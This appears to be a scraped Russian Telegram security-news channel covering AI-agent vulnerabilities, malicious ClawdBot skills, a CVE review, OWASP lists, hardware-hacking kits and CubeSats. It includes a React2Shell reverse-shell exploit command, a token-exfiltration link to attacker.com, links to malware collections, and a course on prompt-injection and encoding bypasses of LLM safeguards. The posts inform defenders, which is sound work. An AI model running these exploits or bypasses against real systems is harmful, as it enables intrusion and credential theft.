769
Мир проигравшего киберпанка. Картинки, новости, мануалы, DIY. Для связи: @the29a
ClawdBot Skills Just Ganked Your Crypto
Немного прослоупочил и пропустил важную веху в эре программного обеспечения для нейронок (или связанного с ними). Теперь это полноценный софт. По крайней мере со своими зловредами в своих "репозиториях".
Кратко:
- 386 вредоносных навыков маскируются под инструменты автоматизации торговли криптой.
- Зловредные навыки, опубликованные пользователем hightower6eu, скачали почти 7000 раз.
- Все вредоносные навыки используют один и тот же С2 (91[.]92[.]242[.]30).
Схема проста: фейковый алерт -> "обязательный AuthTool" -> one-liner или ZIP-архив с exe-файлом.
Цели тривиальны: API‑ключи бирж, приватные ключи (MetaMask), пароли браузеров, ключи SSH, токены AWS/GCP.
Разбираться с этим никто не будет, сам Питер советует делать хорошо, а плохо не делать. Но появилось партнёрство с Virustotal, которое вряд ли радикально изменит ситуацию.
Ссылки и IOC есть в статье.
Нейронки, которые воруют крипту. Если ClawdBot так хорош, то почему он не может сканировать навыки?
Это точно тот киберпанк, который мы заслужили.
Раз уж начали неделю c AI, то продолжим небольшим курсом от Aiteera.
Сам курс небольшой и состоит из 9 уроков, и скорей рассчитан на начинающих:
- Introduction
- Basic Defense Bypass
- Advanced Techniques
- Obfuscation Attacks
- Leetspeak Attacks
- Text Reversal Techniques
- Base64 & Encoding Bypasses
- Emoji Obfuscation
- Cipher & Substitution Patterns
А для тех, кто уже преисполнился, может опробовать свои силы в Antijection Challenge.
Про Clawdbot вещают из каждого утюга. Self-hosed-революция, сотни или даже тысячи скупленных Mac Mini. Штука действительно интересная и даже захотелось себе такое развернуть. Но сейчас не об этом.
Из минорных новостей: Clawdbot успел аж 2 раза поменять имя и нынче он OpenClaw. Новость не примечательная, и скорей для общей информации.
Теперь немного интересного:
Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site - из-за мисконфига в сервисе Moltbook утекли данные 1.49 миллионов учётных записей. Moltbook это социальная сеть для агентов, и если верить основателю, то и написана она так же OpenClaw.
1-Click RCE To Steal Your Moltbot Data and Keys - цепочка их двух ошибок:
1. Отсутствие проверки Origin в WebSocket;
2. Утечка токена авторизации.
Уязвимость уже имеет CVE - CVE-2026-25253.
Hacking Clawdbot and Eating Lobster Souls - статья от Джеймисона О'Рейли (Jamieson O’Reilly) с разбором уязвимостей в архитектуре OpenClaw. Тут получился целый набор: агенты доступные из интернета, Prompt Injection, уязвимости в цепочках поставок данных, манипуляция логикой.
Ну и дежурное напоминание от Infostealers про дополнительные угрозы инфостилеров - ClawdBot: The New Primary Target for Infostealers in the AI Era.
В общем, разработка и деплой на вайбе приводит к занятным и не очень приятным результатам.
Год заканчивается, время подводить итоги, показывать какие-нибудь циферки и поделиться своими выводами и видением.
Попробую и я сойти за умного и поделиться своими заметками.
Топ 5 CVE (плюс бонус):
1. React2Shell (CVE-2025-55182) - мой личный топ года. Красиво, эпично и масштабно. 10/10.
2. Windows NTLM V1 Elevation of Privilege Vulnerability (CVE-2025-21311) - мне редко интересны уязвимости в Windows (правда там и на samba импакт), но тут прямо здорово. NTLM V1 в 2025 году? Что может пойти не так?
3. Microsoft WSUS Deserialization RCE (CVE-2025-59287) - снова уязвимость в Windows, но зато какая. А если учесть, что были найдены хосты WSUS, доступные из дикого интернета, то совсем красота получается.
4. Apache Tomcat Path Traversal (CVE-2025-55752) - немного набивший оскомину Tomcat, который каждый год должен быть в таких топах.
5. n8n Remote Code Execution (CVE-2025-68613) - AI-автоматизация врывается в тренды, в том числе и с CVE.
Бонус:
MongoDB Unauthenticated Memory Leak Exploit (MongoBleed) (CVE-2025-14847) - запоздалый "подарок" под конец года. Бага в zlib позволяет злоумышленникам инициировать утечку информации.
Список можно продолжать ещё долго, но остановимся на этом.
Количество CVE от года к году продолжает расти. Если 2024 закончился на ≈ 40 тысячах (40303 по данным CVEDdetails, 39972 по данным NVD), то 2025 заканчивается на 47к+, что показывает примерный прирост ~40% (в среднем 135 новых CVE в день).
По критичности выходит примерно следующее (данные везде разные, возьму за основу CVEFeed.io):
Всего: 49170 CVE
Critical (9.0–10.0): ≈ 13.6 % (6672 уязвимости)
High (7.0–8.9): ≈ 34.1 % (16721 уязвимость)
Medium (4.0–6.9): ≈ 43.8 % (около 21,236 уязвимостей)
Low (0.1–3.9) + N/A ≈ 1.8 % (897 меньшая часть, плюс некоторые без оценки)
N/A: 3 164 ≈ 6.5 %
Данные разнятся, но ± количество и соотношение такое (CVE.ICU показывает схожие цифры, да и пока эти цифры указываешь, информация уже теряет актуальность).
C Weaknesses всё довольно ожидаемо и CWE Top 5 выглядит так:
- XSS (CWE-79)
- SQLi (CWE-89)
- CSRF (CWE-352)
- Missing Authorization (CWE-862)
- Out-of-bounds Write (CWE-787)
Тренды:
- Нейронки: не только в атаке, но и в обороне. Как минимум, детекты дипфейков и прочего AI-generated контента уже более частое явление.
- Supply chain: со временем лучше не становится, и даже в OWASP Top 10 2025 Software Supply Chain Failures находится на 3 месте.
- Nation-state hackers: не особо какая новость, но активность Nation-state хакеров становится делом привычным, и на спад их активность не идёт.
- Инфостилеры никуда не делись: за 2025 утекли данные как минимум 16 компаний\организаций, а модель Malware-as-a-Service превратила стилеры в процветающий "теневой" бизнес.
Хактивисты измельчали, нейронки активно применяются в фишинге и написании зловредов, а в воздухе повис дух quantum threats to cryptography. А ещё падения Cloudflare и AWS.
Сложно сказать, что нам готовит год грядущий, но каждый раз что-то интересное и неожиданное.
Продолжаем вести наблюдение.
Небольшое продолжение по CVE-2025-55182
CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит.
Получить шелл можно в одну команду:
# Предварительно не забываем поднять листенер, скрипт его не поднимает.
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
# Или сразу прогнать список
python3 exp.py -f targets.txt --check
А тем временем в React и Next.js появились CVE c CVSS 10.0:
- CVE-2025-55182
- CVE-2025-66478 (на cve.org отмечена как REJECTED, duplicate of CVE-2025-55182)
Пошло довольно кучно: уязвимость затрагивает 19.0.0, 19.1.0, 19.1.1 и 19.2.0, а также фреймворки, использующие эти пакеты, включая Next.js 15.x и 16.x, использующие App Router.
Фиксы есть в версиях:
React: 19.0.1, 19.1.2, 19.2.1
Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
PoC пока не появился, но думаю, что можно ждать уже в ближайшее время.
UPD: PoC появился.
—
React Blog: Critical Security Vulnerability in React Server Components
Vercel: Summary of CVE-2025-55182
Github GitHub Advisory Database: Next.js is vulnerable to RCE in React flight protocol
OWASP опубликовали OWASP Top 10:2025 RC1.
Как предварительно будет выглядеть новый Top 10:
- A01:2025 - Broken Access Control
- A02:2025 - Security Misconfiguration
- A03:2025 - Software Supply Chain Failures
- A04:2025 - Cryptographic Failures
- A05:2025 - Injection
- A06:2025 - Insecure Design
- A07:2025 - Authentication Failures
- A08:2025 - Software or Data Integrity Failures
- A09:2025 - Logging & Alerting Failures
- A10:2025 - Mishandling of Exceptional Conditions
Появились новые категории:
- A03:2025 - Software Supply Chain Failures, которая по сути является расширением A06:2021-Vulnerable and Outdated Components, охватывая всю экосистему программного обеспечения, включая зависимости, системы сборки и инфраструктуру распространения.
- A10:2025 - Mishandling of Exceptional Conditions, не самая понятная категория, так как пока выглядит довольно абстрактно (хотя тут целых 24 CWE).
Из прочих изменений:
- Broken Access Control всё так же занимает первое место (3.73% of applications tested had one or more of the 40 Common Weakness Enumerations (CWEs) in this category), но туда переехал A10:2021 – Server-Side Request Forgery (SSRF).
- Security Misconfiguration стал встречаться чаще, так что ожидаемо переместился с пятого на второе.
Cryptographic Failures, Injection и Insecure Design, уехали на две позиции вниз, в остальном заметных изменений нет.
Предлагаю сегодня поговорить об оборудовании, которым я, а также мои коллеги по аппаратному цеху, используют в своей повседневной работе. Сразу скажу, что не все из представленного списка является must-have’ным, так что можно сохранить небольшую (большую) копеечку при входе в программно-аппаратный хакинг.
1. USB-COM порт - брал на АлиЭкспрессе за 119 рублей, сейчас стоит 115 с бесплатной доставкой, что очень достойно. Нужен для подключения и управления умным оборудованием, включая промышленные маршрутизаторы, терминалы, АСУТП и т.д.
2. Программатор CH341 - в базовой комплектации можно взять за 270 рублей, но я бы предложил добавить еще 80 и укоплектоваться прищепкой (не лучший подход, но точно самый оперативный). Необходим для снятия прошивок с IoT и других умный устройств (включая BIOS твоей материнки).
3. USB-TTL aka UART адаптер - 124 рубля с доставкой. Нужен для подключения и управления IoT-устройствами, включая роутеры, домофоны, телевизоры, умные колонки, пылесосы и другие современные умные вещи. Незаменимая вещь в арсенале аппаратчика. Советую взять сразу несколько, так как легко спалить (у каждого хардвер хакера есть свое кладбище микросхем :).
4. Логический анализатор - всего 397 рублей, зато удовольствия почти на 2 тысячи долларов. Позволяет захватывать, отображать и анализировать цифровые сигналы (UART, I2C, SPI, JTAG и др., но для USB и Ethernet скорость маловата), предоставляя подробную информацию о передаваемых пакетах данных.
5. RS485 адаптер - еще одно устройство для управления умными устройствами, в основном технологическими, построенными по принципу общей шины. 130 рублей на АлиЭкспрессе + 42 рубля доставка.
6. Многофункциональный Tigard - 49 американских рублей + 8 за доставку. При покупке я еще анкету заполнял, с какой целью он мне нужен и уведомлял, что буду использовать его только в законных целях 💁… в общем в течении месяца мне с горем пополам доставили. Есть SPI/JTAG, UART, I2C и SWD подключения, а также ручная смена напряжения - 0, 1.8, 3.3 и 5 вольт. Как по мне, так это совершенно бесполезная вещь, хоть и красивая. Пользовался 2 раза: когда купил и когда использовал как замену после спаленного UART’а.
7. XGecu T48 программатор - потрясающая вещь, которая должна быть обязательно у каждого. В настоящий момент поддерживает 35696 микросхем для снятия и презаписи прошивки. Просто наземенимая вещь, хотя и стоит порядка 6 тысяч рублей. Я бы советовал брать сразу с набором переходников, чтобы покрыть больший пласт форм-факторов, но если что, можно и попозже докупить.
Итого: 1158 рублей на необходимый минимум. Провода и джамперы не беру в расчет, так так стоят “копейки” и обычно поставляются с адаптерами в комплекте.
6 тысяч для апгрейда программатора (потом, когда поймете, что CH341 становится недостаточно)
Ну и не совершайте моих ошибок и не тратьтесь на Тигард.
Жду в комментариях ваши адаптеры и используемое оборудование ;)
🔁 Поделись с теми, кому это может быть полезно 💬@glinkinivan
Пропустил новость от марта, но теперь навёрстываю: OWASP Top 10 for LLMs and Generative AI обновился (да, если кто не знал, есть и такое, я писал об этом около года назад) и теперь есть на русском языке: OWASP Top 10 для LLM и генеративного ИИ (2025)
Так же появились:
- Securing Agentic Applications Guide 1.0
- GenAI Incident Response Guide 1.0
Сам LLM Top 10 претерпел некоторые изменения и сейчас выглядит так:
- LLM01:2025 Prompt Injection
- LLM02:2025 Sensitive Information Disclosure
- LLM03:2025 Supply Chain
- LLM04:2025 Data and Model Poisoning
- LLM05:2025 Improper Output Handling
- LLM06:2025 Excessive Agency
- LLM07:2025 System Prompt Leakage
- LLM08:2025 Vector and Embedding Weaknesses
- LLM09:2025 Misinformation
- LLM10:2025 Unbounded Consumption
Сравнить с прошлым годом можно тут.
Наткнулся тут на статью со "срывом покровов" - Вся правда про мессенджер Max!
Страшно, очень страшно, если бы мы знали что это такое, мы не знаем что это такое.
ACCESS_COARSE_LOCATION и ACCESS_FINE_LOCATION: геопозиция. Не знаю, можно ли в Max скинуть гео, но в целом функционал стандартный.BLUETOOTH_CONNECT: мы же хотим использовать свои колонки (будь они неладны) и наушники с гарнитурами, верно?WRITE_EXTERNAL_STORAGE, READ_MEDIA_VISUAL_USER_SELECTED, READ_MEDIA_IMAGES, READ_MEDIA_VIDEO, CAMERA: мы что-то фотографируем, отправляем мемы с котами, сохраняем и отправляем фотографии и документы.READ_CONTACTS: всё просто - доступ к контактам.POST_NOTIFICATIONS: оповещения о сообщениях.REQUEST_INSTALL_PACKAGES: вот тут не уверен. Возможно, реализовано обновление как у Telegram, установленного не из сторы.Плюс ко всему, я был шокирован, что Max отказался запускаться на Android 9. Почему современный мессенджер не поддерживает не такую уж старую систему? Это, честно говоря, настораживает.
Копнув ещё глубже, я обнаружил, что Max использует jar-файлы для внедрения в систему вашего устройства.
А теперь самое тревожное: все данные, которые собирает Max — от ваших чатов до информации об устройстве, — отправляются прямиком на сервера VK.
Scanning Beyond the Patch: A Public-Interest Hunt for Hidden Shells
Патчи это хорошо, но они не гарантируют устранение уязвимости — после фикса уязвимости на разных устройствах (как сетевых, так и серверов и разных эндпоинтах) могут сохраняться перманентные бэкдоры, предоставляющие злоумышленнику долгосрочный доступ.
Примеры из реальных инцидентов:
1. Citrix ADC / NetScaler (CVE‑2023‑3519)
- Были обнаружены web‑шеллы, скрытые в /var/vpn/themes и /logon/LogonPoint/uiareas.
- Первый вариант шелла отвечал HTTP 201, а второй — "пустым" 404, что нестандартно для системы.
2. Cisco IOS‑XE (CVE‑2023‑20198)
- Внедрялись фальшивые страницы 404 или короткие строки версий shell.
- Использовались нестандартные HTTP-заголовки и параметры типа %25 или logon_hash=1, чтобы обнаружить заражённые устройства.
3. Ivanti Connect Secure (CVE‑2024‑21893)
- Бэкдор отвечал HTTP 200 на то, что должен был отдавать 404, или возвращал uname -a.
- Также внедрялись скрытые файлы index.txt(1,2), которые можно было обнаружить при сканировании.
Каждый случай показывает, что компрометация может пережить исправление, и фикс не гарантирует устранение уязвимости полностью.
Хотя бывают и более сложные случаи, вроде CVE-2025-20309 с замечательным моментом в описании:
attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted.
А вы ещё помните Hak5 и их SharkJack?
Если оба названия для вас в новинку, то ничего страшного, но кратко напомню: Hak5 это авторы WiFi Pineapple (свои версии которого не так давно все активно пытались собрать, например тут), а SharkJack аналог Rubber Ducky, но с Ethernet.
И продолжая старую традицию энтузиасты продолжают делать свои альтернативы.
Есть и альтернатива для SharkJack - Raspyjack.
Дешевле, открытей, громозче. Но от автора Evil-M5.
Необходимое железо:
- Raspberry Pi Zero 2 W (or Pi Zero, Pi 4)
- Waveshare 1.44" SPI TFT LCD HAT w/ joystick + 3 buttons
- Waveshare USB-Ethernet HUB HAT
Функционал:
- Recon: сканирование nmap c профилями
- Shells: reverse-shell launcher (использование Raspyjack в роли импланта)
- Credentials capture: Responder, ARP MITM + packet sniffing, DNS-spoof phishing
А ещё файловый браузер, Loot viewer, редактор тем, бэкап-рестор конфигов и вот это всё.
С документацией беда, конфиги не вынесены из скрипта, так что лёгкой прогулки не ждите.
dnsimple (dns-хостер такой) выпустили комикс по работе DNSSEC - How DNSSEC works.
А для тех, кто всё понял - есть небольшая игра.
Всё на английском, но вы можете помочь с переводом.
Пятничный хакинг железочек.
На этот раз не просто сухая теория, а целая hands-on платформа-лаборатория - PwnPad, для которой сначала надо бы собрать необходимую железку.
Да, заказываем плату (герберы, бомы и прочее тут), берём Arduino UNO (потребуется для прошивки), паяльник, рассыпуху и вперёд.
Что потребуется для сборки:
- Arduino UNO на ATmega328P с DIP-панелью
- Паяльник, провода, флюс
- Компоненты из BOM
- Arduino IDE
- Сама плата PwnPad
Рекомендуемое оборудование для решения задач
- Мультиметр
- Arduino UNO
- Логический Анализатор
- Провода-перемычки
- Raspberry Pi Pico и MOSFET для решения задач по Fault Injection
Всего доступно 12 задач, в ходе которых можно получить навыки использования основных протоколов (UART , SPI и I2С), навыки дампа прошивки, а так же пощупать продвинутые техники, вроде Fault Injection и Side-channel attack.
Полная инструкция по сборке и прошивке доступна в PDF, а так же есть видео сборки.
Про Vibe coding сейчас только ленивый не говорит. И клоны сайтов делают (нередко для фишинга, как в случае с same.dev) и SaaS целый (не без нюансов) и вообще кучу всего (и я даже не про AI/ML стартапы, где AI = An Indian, а LLM = Low-cost Labor in Mumbai).
Пока одни ломают копья в баталиях Vibe Coding: Pros and Cons, вторые используют сгенерированный код везде, где только можно, третьи пытаются понять, как это секурить.
Что мы имеем:
- Vibe coding позволяет быстро создавать прототипы, но создает уязвимости.
- В коде, сгенерированном искусственным интеллектом, часто отсутствуют security features, если они не указаны явно.
- Security-by-design в vibe coding сущность незнакомая, что приводит к появлению реальных уязвимостей в развернутых приложениях.
Reflectiz выпустили целый Whitepaper: Secure Vibe Coding: The Complete New Guide.
Получился OWASP Top 10 для бедных, без особых откровений.
Но иногда ИИ ведёт себя как разработчик:
- ИИ фокусируется на функциональности, а не на безопасности
- Непроверенный код может привести к скрытым проблемам.
- Код от ИИ бывает неэффективным и трудно поддерживаемым.
Что делать:
- Явно указывать требования безопасности (например, "Используй параметризованные запросы").
- Применять многоэтапные промпты (сначала код, потом проверка на уязвимости).
- Запрещать опасные практики (например, "Не храни секреты в коде").
В остальном всё то же, что и обычно
- Code Review
- SCA/OSA
- SAST/DAST
- прочие проверки, которые вы используете.
Краткий вариант на Hacker News:
The Hacker News: Secure Vibe Coding: The Complete New Guide
Полный Whitepaper:
reflectiz.com: Secure Vibe Coding: The Complete New Guide.pdf
One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)
Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.
🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)
⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего
💫 Сценарий:
1️⃣ Жертва кликает ссылку:https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте
📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control
✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun
Нейрослоп теперь банановый зловредный. Check Point Research считает, что мы вошли в эру киберкрайм-сингуялрности и аноны могут создавать зловреды с помощью нейронок.
Речь идёт про VoidLink, и это не просто какая-то обычная малварь, а целый модульный фреймворк, с системой плагинов и защитой (runtime code encryption, self-deletion upon tampering). Разработчики не известны, но на всякий случай виноват Китай, а сам фреймворк активно развивается и есть предположение, что он предназначен для коммерческого использования.
Можно сказать, что это официально первый фреймворк, написанный с использованием нейронок, и не скрипт-кидди, а опытным одиночкой или командой.
Пока не ясно, как будут развиваться события, но начало уже увлекательное.
Очередной год подходит к завершению, и можно отложить дела и планы в сторону и перейти к салатам и поздравлениям.
Про то, что год был тяжелый все говорят каждый раз, так что не буду это повторять.
В наступающем году желаю достигать своих целей, открывать новые горизонты, строить и ломать (каждый год об этом говорю), но и про отдых не забываем.
Всё будет, как мы любим.
До встречи в 2026.
И по традиции, музыка:
Если в AI\ML есть Red Team, то для него должен быть Red Team Field Manual.
А если серьезно, то тема довольно интересная, а тут всё и сразу в одном месте.
Сам Field Manual, инструменты и скрипты так же доступны на Github:
github.com/Shiva108/ai-llm-red-team-handbook
А вот и первый PoC и шаблон для Nuclei.
А кто-то уже начал PoC продавать.
Advent of Cyber 2025 стартанул
Это интересное путешествие в мир Securitty - как для защитников, так и для нападающих - с любым опытом. Присоединяйтесь, будет весело!
Модель Cubesat это интересно, но можно собрать и настоящий. С одной стороны, вещь весьма специфичная, однако готовые проекты попадают и на сайтах вроде instructables (как вам Cubesat на HyperDuino?).
Немного истории
В далёком 2011 году члены Space Systems Design Studio основали проект Kicksat. Ребята собрали какое-то количество денег на Kickstaterer, успешно собрали и отправили свои кубсаты на орбиту, тем самым показав, что такое возможно не только для учёных или университетов, но и для небольших проектов.
Репозиторий проекта всё ещё доступен на Github.
Но потом появились Space-X, Arduino, Raspberry Pi, EPS всех цветов, 3D-печать, доступные фрезеры с ЧПУ и всё завертелось.
Space-X сделали отправку кубсатов доступнее (ценники от $50,000 до $500,000 это всё ещё много, но уже не напоминают номер телефона), а доступные SBC, микроконтроллеры и средства проектирования и изготовления сделали производство доступным не только на серьёзных фабриках, а в гараже.
Всё это вылилось в небольшие, но вполне доступные проекты.
Например:
- Build Your Own Arduino Satellite / CubeSat от MkmeOrg">MKme Lab
- $1K CubeSat от RG Sat
А так же в несколько небольших книг на тему Cubesat от астронома-любителя из Мэриленда — Александра «Сэнди» Антунеса:
- DIY Satellite Platforms
- Surviving Orbit the DIY Way
- DIY Instruments for Amateur Space
- DIY Comms and Control for Amateur Space
Но всё это подавало признаки жизни годы назад. Как же ситуация обстоит сейчас?
Текущее время.
Кубсаты вышли на новый уровень, есть коммерческие варианты за кучу денег (например от EnduroSat), так и варианты побюджетней:
- RASCube от Robinson Aerospace
- IOS CubeSat 3.0 от Interorbital Systems
- My Sat Space Fan Kit от MySatKit
А если вам кажется, что это всё не серьёзно, то оно вполне себе отправляется на орбиту. Да и опыт фанерного WISA Woodsat показывает, что кубсаты могут быть очень разными.
Есть и проекты на стыке кибер-безопасности и Сubesat, вроде Ethos Labs, но там можно только посмотреть, либо удачно попасть на конференцию, или быть гос. заказчиком (оба пункта применимы только для США).
Но есть и Open Source и Open Hardware проекты, например - Build a CubeSat, где весь софт и железо доступны в исходниках, а процесс разработки и сборки можно посмотреть на канале автора.
- buildacubesat">Youtube: Build a CubeSat
- codeberg: buildacubesat-project
Вообще, постройка Cubesat это не столько отправка готового изделия в космос (что довольно дорого), сколько наработка довольно важного навыка - проектирование и сборка энергоэффективного автономного устройства, которое может пригодится не где-то на орбите, но и в стратосфере или даже на земле.
—
Jeff Geerling: PIS IN SPACE!
Level 2 Jeff: How small can you make a satellite? Here are six in a box!
How to Build Your Own Satellite: CubeSats
Окинув грустным взглядом CISA KEV в голову приходит мысль: надо что-то менять. Нет, не отказываться от KEV вообще.
Я скорей о том, можно ли собрать что-то своё из текущих данных. И в теории да.
Да, есть платные сервисы, вроде VulnCheck, но и там не без проблем.
Немного порассуждаем без цифр, схем, формул и кода.
Помимо CISA KEV (выбрасывать который не обязательно) у нас есть:
- Metasploit и список эксплоитов в нём
- exploit-db (и его гитлаб)
- PoC-in-GitHub
- Nuclei и его шаблоны
- CISA KEV (если вы его не выбросили). В данном случае он скорей как индикатор "настолько плохо, что есть даже там"
В итоге мы получаем 4 источника информации о эксплоитах (где-то фактических, где-то просто отметку, что такой есть) и инструмент, который это просто и быстро может детектить. Набор источников и инструментов может быть больше, я беру то, что доступно.
Что можно сделать дальше?
- Просто складывать количество эксплоитов из разных источников: можно, но мы получим даже не количественную метрику, а просто количество вхождений.
- Назначение веса каждому индикатору: выглядит как направление к решению. Эксплоит из вашего любимого фреймворка (не обязательно msf) явно будет иметь вес значительно выше, чем китайский PoC на perl с Github.
Учитывать ли EPSS? Вопрос любопытный. Всегда казалось, что он должен был быть эдакой "серебрянной пулей" в VM, но фактически он отстаёт. Если только считать какой-то EPSS Base Score и ваш EPSS Custom Score.
Но это всё только часть мозаики, так как ещё надо учитывать CVSS Temporal Score, как-то считать CVSS Environmental Score.
А если у вас есть TI\TH или готовая коробка с этим всем, то можно ещё и Threat Factor учитывать.
Взлом века себе за щеку.
Anonymous France отчитались в Twitter (оно же X) о взломе ftp на сайте Кремля. Звучит внушающе, если не смотреть на скриншоты.
А там прекрасно всё:
- Имена пользователей в дореволюционном стиле
- Шизофренический контент документов
- user: root
- Бэкап базы в 24 килобайта.
Как-то обмельчал современный Anonymous.
Евстафий Гертдудович просил передать:
Носок дошлый самостоятельно природа мучительно собеседник.Читать полностью…
Would you like an IDOR with that? Leaking 64 million McDonald’s job applications
Breaking news: McDonald взломали.
Ладно, новость не вот чтобы Breaking, да взломали не сам McDonald. Исследователи взломали McHire, платформу для подбора персонала с чат-ботами. Наймом кожанных мешком занимается бот Оливия, работающий на технологиях Paradox.ai. Он собирает персональные данные соискателей, оценивает предпочтения, проводит личностные тесты и вызывает баттхёрт у пользователей.
В чём суть?
Интерфейс платформы McHire использовал логин\пароль 123456:123456 при логине через "Paradox team members", однако этим всё не ограничилось и был обнаружен IDOR, позволяющий получить персональные данные более 64 миллионов соискателей.
Всё исправили, вход для Paradox team спрятали, но ситуация забавная.
Threat Hunting Introduction: Cobalt Strike
Использование коммерческих security-фреймворков (или же threat simulation tool) даёт вполне позитивный опыт использования. Всё удобно, в одном месте, со всякими окошечками и прочим. Но удобства любят не только пентестеры и red-team, но и обычные злоумышленники. Но мало кто скрывает серверы таких инструментов, так что немного усилий и всё как на ладони.
Одним из популярных инструментов можно назвать Cobalt Strike, на примере которого и показывается процесс поиска. А заодно автор написал и инструмент - SigStrike.
Примерный порядок действий:
- Определяемся с IoC
- Ищем серверы через shodan (или аналогичный сервис) или можем посканировать руками
- Фильтруем, получая актуальное и активное
- Наслаждаемся нашим Threat Hunting процессом.
По схожему принципу можно искать не только Cobalt Strike, но и прочие C2. Какие-то инструменты придётся дописать самому, что-то тестово развернуть, посмотреть С2-фиды (вроде C2IntelFeeds), но задача вполне решаемая.
payloadartist запустил стильный-модный-молодёжный редактор шаблонов для nuclei - Nuclei Forge.
Что есть:
- YAML-редактор
- Валидатор
- Хэлпер по функциям
И можно сразу проверить написанный шаблон на необходимой целевом URL.
Так же можно за основу взять чужой шаблон (прямо из Gallery) или собрать шаблон сразу на основе CVE (через CVE Search).
А для тех, кто не хочет таких сложностей, но всё же хочет приобщится к hardware hacking есть вариант более доступный - Damn Vulnerable Raspberry Pi.
Что потребуется:
- Raspberry Pi 4B
- Прошивка
- USB-to-TTL адаптер
- Провода-перемычки
- Мультиметр
- Ubertooth One (опционально)
Всего доступно 11 заданий, сами задания не только с описанием и инструкцией, но и решением.
Если у вас есть Raspberry Pi 4B и желание стать хакером-железячником, то это отличный способ начать.
Юзернейм с ником Ephrimgnanam опубликовал три репозитория для реверсеров и исследователей:
- Для любителей поковырять разную малварь:
https://github.com/Ephrimgnanam/Worms
- Для любителей поковырять разные RAT:
https://github.com/Ephrimgnanam/Cute-RATs
- Для любителей поковырять стилеры:
https://github.com/Ephrimgnanam/Cute-Stealers
Да, чудесных чудес там нет, слитых приваток тоже. Всё взято из паблика, но собрано в одном месте.
Пока что нет толкового описания, IOC, референсных ссылок и прочего, но автор обещает сделать. Но это не точно.
Giving an LLM command line access to Nmap
LLM уже давно выполняет разную полезную и не очень работу. Кто-то генерирует бесконечные тексты (коих навалом на развлекательных ресурсах), кто-то генерирует шаблоны для nuclei. А можно и использовать их для разведки и сканирования с использованием nmap.
И если в обычный промпт исполнение скрипта мы не добавим, через дополнительный инструмент llm это можно сделать без проблем.
Что нам потребуется:
- LLM: Github: llm / LLM Quick Start
- Cкрипт: llm-tools-nmap
Настраиваем всё и пробуем примеры из документации:
# Информация о сети
llm --functions llm-tools-nmap.py "What's my local network information?"
# Обнаружение хостов в сети
llm --functions llm-tools-nmap.py "Scan my local network to find live hosts"
# Информация о сервисах на портах 22, 80, 443
llm --functions llm-tools-nmap.py "Scan 192.168.1.1 for services on ports 80,443,22"
Warning:
Стоит учитывать, что вся эта чудо-автоматика работает не совсем предсказуемо, и стоит тестировать её работу в изолированной среде.
Доступ в дикий интернет или прод несёт свои риски.